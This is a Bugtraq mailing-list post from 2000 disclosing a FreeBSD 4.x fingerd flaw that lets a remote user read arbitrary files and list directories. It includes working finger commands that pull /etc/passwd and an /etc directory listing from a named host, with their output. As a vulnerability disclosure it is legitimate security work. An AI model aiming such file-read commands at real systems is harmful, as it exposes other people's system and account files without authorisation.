[17039] in bugtraq
Re: [sa2c@and.or.jp: bin/21704: enabling fingerd makes files
daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Wed Oct 4 02:26:31 2000
Mail-Followup-To: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>,
bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-ID: <20001003201812.K6009@riget.scene.pl>
Date: Tue, 3 Oct 2000 20:18:12 +0200
Reply-To: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20001002205640.N2618@riget.scene.pl>; from
venglin@FREEBSD.LUBLIN.PL on Mon, Oct 02, 2000 at 08:56:40PM +0200
On Mon, Oct 02, 2000 at 08:56:40PM +0200, Przemyslaw Frasunek wrote:
> If finger takes full path name as user name, it prints out contents of
> that file. Because fingerd executes finger as local information
> provider, finger /path/to/file@some.host prints /path/to/file at
> some.host.
BTW. Problem persists only in 4.x branch. Of course, it allows also
to traverse directory structures:
riget:venglin:~> finger /etc/@lagoon | strings | head -n 3
[lagoon.freebsd.lublin.pl]
^@^@^L^@^D^A.^@^@^@^B^@^@^@^L^@^D^B..^@^@^@^W^A^@^T^@^D^Hdefaults^@^A^@^@^A
^@^@^T^@^H protocols^@^@^@^B
riget:venglin:~> finger /etc/passwd@lagoon | head -n2
[lagoon.freebsd.lublin.pl]
root:*:0:0:Przemyslaw Frasunek:/home/root:/usr/local/bin/tcsh
--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin@freebsd.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
